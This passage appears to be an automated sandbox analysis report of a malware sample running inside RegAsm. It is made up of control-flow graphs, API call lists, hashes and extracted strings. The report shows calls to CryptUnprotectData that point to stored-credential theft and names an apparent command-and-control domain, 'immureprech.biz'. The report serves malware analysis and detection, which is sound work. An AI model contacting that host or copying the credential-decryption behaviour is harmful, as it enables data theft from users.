                                                      • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 994 415f66-415f77 call 419770 997 4162d0 994->997 998 415fb5-415fbe 994->998 999 416107-416109 994->999 1000 416056-416061 994->1000 1001 4160fb-416100 994->1001 1002 4162dd-4162ff 994->1002 1003 415fac 994->1003 1004 415f7e-415f83 994->1004 1005 41610e-416113 994->1005 1023 4162d8 997->1023 1015 415fc0-415fd2 998->1015 1011 4165f9-416609 999->1011 1012 416070-416082 1000->1012 1001->997 1001->999 1001->1002 1001->1005 1006 416403-41640b 1001->1006 1007 416412-416418 1001->1007 1008 4163f8-4163fe 1001->1008 1009 41641d-41645a 1001->1009 1010 4163bc-4163f1 call 43c280 CryptUnprotectData 1001->1010 1013 416300-416327 1002->1013 1003->998 1004->1003 1014 416120-416126 1005->1014 1006->1007 1006->1009 1019 416461-4164ac 1006->1019 1020 4165b0 1006->1020 1021 4164b3-4164b8 1006->1021 1022 4165a7-4165ad call 407f70 1006->1022 1006->1023 1024 41666a-416677 1006->1024 1025 4165ee-4165f6 call 407f70 1006->1025 1026 4165b6-4165c9 call 43c280 1007->1026 1017 4165ce-4165e6 call 43c280 1008->1017 1009->1019 1009->1020 1009->1021 1009->1022 1009->1023 1009->1024 1009->1025 1010->1006 1010->1007 1010->1008 1010->1009 1010->1019 1010->1020 1010->1021 1010->1022 1010->1023 1010->1024 1010->1025 1027 416610-416622 1011->1027 1012->1012 1018 416084-41608f 1012->1018 1013->1013 1028 416329-416334 1013->1028 1014->1014 1029 416128-416139 1014->1029 1015->1015 1030 415fd4-415fdf 1015->1030 1017->1025 1033 416090-4160a4 1018->1033 1019->1020 1019->1021 1019->1022 1019->1023 1019->1024 1019->1025 1020->1026 1035 4164bd-4164c6 1021->1035 1022->1020 1023->1002 1053 4169ef-416a02 call 43a9b0 1024->1053 1025->1011 1026->1017 1027->1027 1037 416624-41662f 1027->1037 1038 416340-416354 1028->1038 1039 416140 1029->1039 1040 41613b-41613e 1029->1040 1041 415fe0-415ff4 1030->1041 1033->1033 1044 4160a6-4160b1 1033->1044 1035->1035 1046 4164c8-4164d1 1035->1046 1048 416631-41663b 1037->1048 1049 41665c-416663 1037->1049 1038->1038 1050 416356-416361 1038->1050 1051 416141-41614c 1039->1051 1040->1039 1040->1051 1041->1041 1052 415ff6-415ffe 1041->1052 1055 416050 1044->1055 1056 4160b3-4160bb 1044->1056 1057 4164d3-4164d8 1046->1057 1058 4164da 1046->1058 1059 416640-416647 1048->1059 1049->997 1049->1002 1049->1006 1049->1007 1049->1008 1049->1009 1049->1010 1049->1019 1049->1020 1049->1021 1049->1022 1049->1023 1049->1024 1049->1025 1060 416363-41636b 1050->1060 1061 4163aa-4163b5 1050->1061 1062 416153 1051->1062 1063 41614e-416151 1051->1063 1052->1000 1064 416000-41600b 1052->1064 1055->1000 1066 4160c0-4160c7 1056->1066 1068 4164dd-416504 call 407f60 1057->1068 1058->1068 1069 416650-416656 1059->1069 1070 416649-41664c 1059->1070 1071 416370-416377 1060->1071 1061->1006 1061->1007 1061->1008 1061->1009 1061->1010 1061->1019 1061->1020 1061->1021 1061->1022 1061->1023 1061->1024 1061->1025 1072 416154-416168 call 407f60 1062->1072 1063->1062 1063->1072 1073 416010-416017 1064->1073 1075 4160d0-4160d6 1066->1075 1076 4160c9-4160cc 1066->1076 1093 416509-416536 1068->1093 1069->1049 1069->1053 1070->1059 1078 41664e 1070->1078 1079 416383-41638c 1071->1079 1080 416379-41637c 1071->1080 1095 416271-4162c9 call 43c280 CryptUnprotectData 1072->1095 1096 41616e-416175 1072->1096 1081 416020-416026 1073->1081 1082 416019-41601c 1073->1082 1075->1055 1085 4160dc-4160ed call 43a9b0 1075->1085 1076->1066 1084 4160ce 1076->1084 1078->1049 1079->1061 1089 41638e-4163a7 call 43a9b0 1079->1089 1080->1071 1087 41637e-416381 1080->1087 1081->1000 1091 416028-416041 call 43a9b0 1081->1091 1082->1073 1088 41601e 1082->1088 1084->1055 1099 4160f2 1085->1099 1087->1061 1088->1000 1089->1061 1091->1000 1093->1093 1100 416538-416541 1093->1100 1095->997 1095->1002 1095->1006 1095->1007 1095->1008 1095->1009 1095->1010 1095->1019 1095->1020 1095->1021 1095->1022 1095->1023 1095->1024 1095->1025 1102 416193-4161db call 41d150 * 2 1096->1102 1099->1001 1105 416543-416546 1100->1105 1106 41655a-41656b 1100->1106 1118 416180-41618d 1102->1118 1119 4161dd-4161f2 call 41d150 1102->1119 1109 416549-416558 1105->1109 1110 416586 1106->1110 1111 41656d-416570 1106->1111 1109->1106 1109->1109 1114 416589-41659f call 408bd0 1110->1114 1113 416573-416582 1111->1113 1113->1113 1116 416584 1113->1116 1114->1022 1116->1114 1118->1095 1118->1102 1119->1118 1123 4161f4-416224 1119->1123 1123->1118 1124 41622a-416247 call 41d150 1123->1124 1124->1118 1127 41624d-41626c 1124->1127 1127->1118
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A67H
                                                      • API String ID: 0-3389657328
                                                      • Opcode ID: c8e58b8bc47f8f660499b6455e80629c0afce5cc1bbea26fbd3bc9902617d378
                                                      • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                      • Opcode Fuzzy Hash: c8e58b8bc47f8f660499b6455e80629c0afce5cc1bbea26fbd3bc9902617d378
                                                      • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1128 431839-43191a call 414060 GetSystemMetrics * 2 1136 431921-4319b2 1128->1136
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem
                                                      • String ID:
                                                      • API String ID: 4116985748-3916222277
                                                      • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                      • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                      • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                      • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1139 435ea0-435ec3 1140 435ec5-435ec8 1139->1140 1141 435f05-435f25 1140->1141 1142 435eca-435f03 1140->1142 1143 435f27-435f2a 1141->1143 1142->1140 1144 435f66-435f6a 1143->1144 1145 435f2c-435f64 1143->1145 1146 435f6c-435f77 1144->1146 1145->1143 1147 435f7b-435f94 1146->1147 1148 435f79 1146->1148 1150 435f96 1147->1150 1151 435f98-435fa3 1147->1151 1149 435fe6-435fe9 1148->1149 1154 435feb 1149->1154 1155 435fed-435ff2 1149->1155 1152 435fd8-435fdd 1150->1152 1151->1152 1153 435fa5-435fd3 call 43a9b0 1151->1153 1157 435fe1-435fe4 1152->1157 1158 435fdf 1152->1158 1153->1152 1154->1155 1159 4361d0-4361dd 1155->1159 1160 435ff8-436018 1155->1160 1157->1146 1158->1149 1162 43601a-43601d 1160->1162 1163 436059-43605d 1162->1163 1164 43601f-436057 1162->1164 1165 43605f-43606a 1163->1165 1164->1162 1166 43606e-436087 1165->1166 1167 43606c 1165->1167 1169 43608b-436096 1166->1169 1170 436089 1166->1170 1168 4360eb-4360ee 1167->1168 1173 4360f2-4360fc 1168->1173 1174 4360f0 1168->1174 1171 4360da-4360df 1169->1171 1172 436098-4360d0 call 43a9b0 1169->1172 1170->1171 1176 4360e3-4360e6 1171->1176 1177 4360e1 1171->1177 1181 4360d5 1172->1181 1178 436100-43610a 1173->1178 1179 4360fe 1173->1179 1174->1173 1176->1165 1177->1168 1182 43610d-43612d 1178->1182 1179->1182 1181->1171 1183 43612f-436132 1182->1183 1184 436134-43616c 1183->1184 1185 43616e-436172 1183->1185 1184->1183 1186 436174-43617a 1185->1186 1187 43617e-436190 1186->1187 1188 43617c 1186->1188 1189 436192 1187->1189 1190 436194-43619a 1187->1190 1188->1159 1191 4361c4-4361c7 1189->1191 1190->1191 1192 43619c-4361c2 call 43a9b0 1190->1192 1194 4361cb-4361ce 1191->1194 1195 4361c9 1191->1195 1192->1191 1194->1186 1195->1159
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: T$U$V$k
                                                      • API String ID: 0-1255220828
                                                      • Opcode ID: 3cc98e4c8ba408357a56dd5da8c2631a94b117a0f7445ac2aa6c666d2f659e02
                                                      • Instruction ID: 419b7bd8d768cf5a93220c289582c9eeb00d0d40764b4ee896287773b3a375b3
                                                      • Opcode Fuzzy Hash: 3cc98e4c8ba408357a56dd5da8c2631a94b117a0f7445ac2aa6c666d2f659e02
                                                      • Instruction Fuzzy Hash: 4CA1043110C7918BD708CB38985022FBBE25BDA324F1A9B2EE4E6473D2D679C945C74B

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1197 40dd25-40dd53 call 431260 call 409700 CoUninitialize 1202 40dd60-40dd81 1197->1202 1202->1202 1203 40dd83-40dd93 1202->1203 1204 40dda0-40ddb2 1203->1204 1204->1204 1205 40ddb4-40ddfd 1204->1205 1206 40de00-40de2e 1205->1206 1206->1206 1207 40de30-40de3d 1206->1207 1208 40de5b-40de6b 1207->1208 1209 40de3f-40de42 1207->1209 1211 40de8d 1208->1211 1212 40de6d-40de71 1208->1212 1210 40de50-40de59 1209->1210 1210->1208 1210->1210 1213 40de90-40de9b 1211->1213 1214 40de80-40de89 1212->1214 1215 40deab-40deb6 1213->1215 1216 40de9d-40de9f 1213->1216 1214->1214 1217 40de8b 1214->1217 1219 40deb8-40deb9 1215->1219 1220 40decb-40ded3 1215->1220 1218 40dea0-40dea9 1216->1218 1217->1213 1218->1215 1218->1218 1221 40dec0-40dec9 1219->1221 1222 40ded5-40ded6 1220->1222 1223 40deeb-40def7 1220->1223 1221->1220 1221->1221 1224 40dee0-40dee9 1222->1224 1225 40df11-40dfca 1223->1225 1226 40def9-40defb 1223->1226 1224->1223 1224->1224 1228 40dfd0-40e002 1225->1228 1227 40df00-40df0d 1226->1227 1227->1227 1229 40df0f 1227->1229 1228->1228 1230 40e004-40e01f 1228->1230 1229->1225 1231 40e020-40e055 1230->1231 1231->1231 1232 40e057-40e090 call 40ba00 1231->1232
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Uninitialize
                                                      • String ID: PT$immureprech.biz
                                                      • API String ID: 3861434553-2693025054
                                                      • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                      • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                      • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                      • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: @$ihgf
                                                      • API String ID: 2994545307-73152791
                                                      • Opcode ID: e8645669652d7f7de95e8985ed7f10f4c364daeafd1946bf51eda8febbb38cfd
                                                      • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                      • Opcode Fuzzy Hash: e8645669652d7f7de95e8985ed7f10f4c364daeafd1946bf51eda8febbb38cfd
                                                      • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: 167H
                                                      • API String ID: 2994545307-2704650348
                                                      • Opcode ID: 38450cec291c2e1082ac86020033df8e189db766218c78d431ee3ea45677ee2a
                                                      • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                      • Opcode Fuzzy Hash: 38450cec291c2e1082ac86020033df8e189db766218c78d431ee3ea45677ee2a
                                                      • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: cdef
                                                      • API String ID: 2994545307-4216504194
                                                      • Opcode ID: 5812c35fa09ee1b791dfb97939491fa1d86feb7d209790cf53f0fe7174bd187e
                                                      • Instruction ID: d704160fc5b89d86d9794d8a66ae716d782a0973953182dc9c1641cf0cee7e05
                                                      • Opcode Fuzzy Hash: 5812c35fa09ee1b791dfb97939491fa1d86feb7d209790cf53f0fe7174bd187e
                                                      • Instruction Fuzzy Hash: 30815471A083108FC718DF24E88096BBBA2EFDA310F19993DE9D557352C735AC05C786
                                                      APIs
                                                      • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: ihgf
                                                      • API String ID: 2994545307-2948842496
                                                      • Opcode ID: 51c2d3c48bead1e24f978db54d90992c46589e6659c1f66f49beee17b18db219
                                                      • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                      • Opcode Fuzzy Hash: 51c2d3c48bead1e24f978db54d90992c46589e6659c1f66f49beee17b18db219
                                                      • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6512a40469e740b689b861a79e551d6f343171b93302e1bf873b536c23dd207b
                                                      • Instruction ID: 96e128fd99fbf524e2f3ef55e43501592b1a8fdc9f4199c5c04fa81f22471a0d
                                                      • Opcode Fuzzy Hash: 6512a40469e740b689b861a79e551d6f343171b93302e1bf873b536c23dd207b
                                                      • Instruction Fuzzy Hash: 96517276A083404FE718DA29CC51B2BB7E3EBD9314F19953EE5C297381DA799C01838A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b47757b6906273ad02da9a725e591644371542262fb03aba45c268f1552915b2
                                                      • Instruction ID: c6b6bb5faf057b6a68f3e5ff18d61b6d7d9c128f7451342645401fa614298587
                                                      • Opcode Fuzzy Hash: b47757b6906273ad02da9a725e591644371542262fb03aba45c268f1552915b2
                                                      • Instruction Fuzzy Hash: F3514831A083009FD7249F18E881A2BB7E2EFDD310F25A93DE58547351EA75DC51C74A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                      • Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
                                                      • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                      • Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b18222f22a9ab2b63a400fcffd4b3a34fd29f6efd4115da0d165384394debb5d
                                                      • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                      • Opcode Fuzzy Hash: b18222f22a9ab2b63a400fcffd4b3a34fd29f6efd4115da0d165384394debb5d
                                                      • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e0ef8b023feb42744f45f8ed2eadfcdc6419d00c3a8250a073fef60970476071
                                                      • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                      • Opcode Fuzzy Hash: e0ef8b023feb42744f45f8ed2eadfcdc6419d00c3a8250a073fef60970476071
                                                      • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1235 43ab0b-43ab1f 1236 43ab20-43ab7b 1235->1236 1236->1236 1237 43ab7d-43abce GetForegroundWindow call 43c7d0 1236->1237
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 0043AB9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ForegroundWindow
                                                      • String ID: ilmn
                                                      • API String ID: 2020703349-1560153188
                                                      • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                      • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                      • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                      • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1241 40ea11-40eb75 CoInitializeEx * 2
                                                      APIs
                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 0040EA15
                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040EB5C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                      • Instruction ID: 6a516bc968bc721a6a6447d4bb28a67b77a0153a8c52e65a7a5ccdf46234fc14
                                                      • Opcode Fuzzy Hash: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                      • Instruction Fuzzy Hash: 7B41E8B4D10B40AFD370EF39DA4B7127EB4AB05250F504B2EF9E6866D4E231A4198BD7
                                                      APIs
                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 781189d5fc44d07fd0e1f4904dd1cba3305d7db9618452ca2d76d837220d8f17
                                                      • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                      • Opcode Fuzzy Hash: 781189d5fc44d07fd0e1f4904dd1cba3305d7db9618452ca2d76d837220d8f17
                                                      • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: BlanketProxy
                                                      • String ID:
                                                      • API String ID: 3890896728-0
                                                      • Opcode ID: c163bcb05f7634e1a4fef36e32eb0508205d9d1b34f8db2584493d2ec9bc581a
                                                      • Instruction ID: 73dc07478978cc97b4fa8368d249e84189bb1c85d8b76e8a997a211bfaa32886
                                                      • Opcode Fuzzy Hash: c163bcb05f7634e1a4fef36e32eb0508205d9d1b34f8db2584493d2ec9bc581a
                                                      • Instruction Fuzzy Hash: C9F0B7B41087018FD314DF28D4A8B1ABBE0EB89304F01881DE4968B3A0DB75AA49CF82
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: BlanketProxy
                                                      • String ID:
                                                      • API String ID: 3890896728-0
                                                      • Opcode ID: ae4746ac1eb4dc45c24d96bd750e06fb844a26f4889db438f9403698b48dbf3c
                                                      • Instruction ID: c20a79fc710e9b772a2336fa53249e87931ee1b57b699406dbd778e39ad0b615
                                                      • Opcode Fuzzy Hash: ae4746ac1eb4dc45c24d96bd750e06fb844a26f4889db438f9403698b48dbf3c
                                                      • Instruction Fuzzy Hash: 5DF098B4509342CFD314DF29C5A871BBBE0BBC4304F10892DE4958B290C7B59949CF86
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 0043AB9F
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ForegroundWindow
                                                      • String ID:
                                                      • API String ID: 2020703349-0
                                                      • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                      • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                      • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                      • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                      APIs
                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E65A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeSecurity
                                                      • String ID:
                                                      • API String ID: 640775948-0
                                                      • Opcode ID: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
                                                      • Instruction ID: 1ef2cd84d3f3a248c300a9315f5ba7c079722d57ce9cb5108686e78c00d3b34e
                                                      • Opcode Fuzzy Hash: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
                                                      • Instruction Fuzzy Hash: 03D0C9343C434076F2654718EC57F1432119302F11F701224B323FE2E1C9D07141860C
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 972951d19d2b685253a3b5f37760d17634b32559eba37820a325e3d7b0dff9ca
                                                      • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                      • Opcode Fuzzy Hash: 972951d19d2b685253a3b5f37760d17634b32559eba37820a325e3d7b0dff9ca
                                                      • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 00438E55
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
